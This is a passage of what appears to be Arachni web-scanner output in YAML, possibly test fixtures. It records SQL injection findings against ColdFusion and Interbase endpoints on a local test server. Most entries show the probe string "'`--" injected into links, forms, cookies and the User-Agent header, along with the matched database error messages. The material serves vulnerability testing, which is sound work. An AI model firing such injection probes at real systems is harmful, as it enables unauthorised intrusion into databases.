      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[SQLServer JDBC Driver\])
    regexp_match: "[SQLServer JDBC Driver]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      [Macromedia][SQLServer JDBC Driver]

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/coldfusion/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/coldfusion/header/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "196"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[SQLServer JDBC Driver]"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[SQLServer JDBC Driver\])
      :match: "[SQLServer JDBC Driver]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/coldfusion/header/flip
      :verification: false
      :id: "[SQLServer JDBC Driver]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[SQLServer JDBC Driver\])
    regexp_match: "[SQLServer JDBC Driver]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, \"[Macromedia][SQLServer JDBC Driver]\\n\", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/coldfusion/header/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/coldfusion/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'`--
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "36"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[SQLServer JDBC Driver]"
    injected: arachni_user'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[SQLServer JDBC Driver\])
      :match: "[SQLServer JDBC Driver]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'`--
      :injected: arachni_user'`--
      :combo: 
        User-Agent: arachni_user'`--
      :action: http://localhost:7842/coldfusion/header/append
      :verification: false
      :id: "[SQLServer JDBC Driver]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[SQLServer JDBC Driver\])
    regexp_match: "[SQLServer JDBC Driver]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      [Macromedia][SQLServer JDBC Driver]

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/coldfusion/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/interbase/form/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "73"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Unexpected end of command in statement
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Unexpected end of command in statement)
      :match: Unexpected end of command in statement
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: form
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/interbase/form/flip
      :verification: false
      :id: Unexpected end of command in statement
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Unexpected end of command in statement)
    regexp_match: Unexpected end of command in statement
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"<b>Warning</b>: ibase_\\nUnexpected end of command in statement\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/interbase/form/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/interbase/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "62"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Unexpected end of command in statement
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Unexpected end of command in statement)
      :match: Unexpected end of command in statement
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: form
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/interbase/form/append
      :verification: false
      :id: Unexpected end of command in statement
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Unexpected end of command in statement)
    regexp_match: Unexpected end of command in statement
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      <b>Warning</b>: ibase_
      Unexpected end of command in statement

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/interbase/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/interbase/link/flip?input=default
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "73"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Unexpected end of command in statement
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Unexpected end of command in statement)
      :match: Unexpected end of command in statement
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: link
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/interbase/link/flip?input=default
      :verification: false
      :id: Unexpected end of command in statement
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Unexpected end of command in statement)
    regexp_match: Unexpected end of command in statement
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"<b>Warning</b>: ibase_\\nUnexpected end of command in statement\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/interbase/link/flip?input=default
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/interbase/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "62"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Unexpected end of command in statement
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Unexpected end of command in statement)
      :match: Unexpected end of command in statement
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: link
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/interbase/link/append?input=default
      :verification: false
      :id: Unexpected end of command in statement
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Unexpected end of command in statement)
    regexp_match: Unexpected end of command in statement
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      <b>Warning</b>: ibase_
      Unexpected end of command in statement

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/interbase/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/interbase/cookie/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;'`--=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "73"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Unexpected end of command in statement
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Unexpected end of command in statement)
      :match: Unexpected end of command in statement
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/interbase/cookie/flip
      :verification: false
      :id: Unexpected end of command in statement
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Unexpected end of command in statement)
    regexp_match: Unexpected end of command in statement
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, \"<b>Warning</b>: ibase_\\nUnexpected end of command in statement\\n\"]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/interbase/cookie/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/interbase/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'`--
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "62"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Unexpected end of command in statement
    injected: cookie value'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Unexpected end of command in statement)
      :match: Unexpected end of command in statement
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'`--
      :injected: cookie value'`--
      :combo: 
        cookie2: cookie value'`--
      :action: http://localhost:7842/interbase/cookie/append
      :verification: false
      :id: Unexpected end of command in statement
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Unexpected end of command in statement)
    regexp_match: Unexpected end of command in statement
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      <b>Warning</b>: ibase_
      Unexpected end of command in statement

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/interbase/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/interbase/header/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "223"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Unexpected end of command in statement
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Unexpected end of command in statement)
      :match: Unexpected end of command in statement
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/interbase/header/flip
      :verification: false
      :id: Unexpected end of command in statement
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:Unexpected end of command in statement)
    regexp_match: Unexpected end of command in statement
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, \"<b>Warning</b>: ibase_\\nUnexpected end of command in statement\\n\", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/interbase/header/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/interbase/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'`--
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "62"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Unexpected end of command in statement
    injected: arachni_user'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:Unexpected end of command in statement)
      :match: Unexpected end of command in statement
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'`--
      :injected: arachni_user'`--
      :combo: 
        User-Agent: arachni_user'`--
      :action: http://localhost:7842/interbase/header/append
      :verification: false
      :id: Unexpected end of command in statement
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
